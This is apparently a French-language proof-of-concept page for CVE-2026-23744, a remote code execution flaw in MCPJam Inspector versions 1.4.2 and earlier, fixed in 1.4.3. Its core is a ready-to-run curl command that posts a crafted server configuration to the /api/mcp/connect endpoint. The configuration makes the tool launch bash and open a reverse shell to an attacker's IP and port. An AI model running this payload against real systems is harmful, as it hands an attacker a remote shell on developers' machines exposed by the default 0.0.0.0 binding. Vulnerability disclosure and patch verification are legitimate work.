
Exploit de preuve de concept pour CVE-2026-23744, une vulnérabilité d'exécution de code à distance dans MCPJam Inspector. Démontre une RCE via une requête HTTP forgée vers le point de terminaison /api/mcp/connect avec un payload de reverse shell.
PoC concernant une vulnérabilité dans MCP Server.
automatisé pour la partie POST avec le corps correct.
/api/mcp/connect
curl http://evil.com:6274/api/mcp/connect --header "Content-Type: application/json" --data '{"serverConfig":{"command":"bash","args":["-c","bash -i >& /dev/tcp/TUIP/TUPUERTO 0>&1"],"env":{}},"serverId":"pruebaxd"}'
MCPJam Inspector est la première plateforme de développement local pour les serveurs MCP. Les versions 1.4.2 et antérieures sont vulnérables à la vulnérabilité d'exécution de code à distance (RCE), qui permet à un attaquant d'envoyer une requête HTTP conçue pour déclencher l'installation d'un serveur MCP, ce qui entraîne une RCE. Étant donné que l'inspecteur MCPJam écoute par défaut sur 0.0.0.0 au lieu de 127.0.0.1, un attaquant peut déclencher la RCE à distance via une simple requête HTTP. La version 1.4.3 contient un correctif.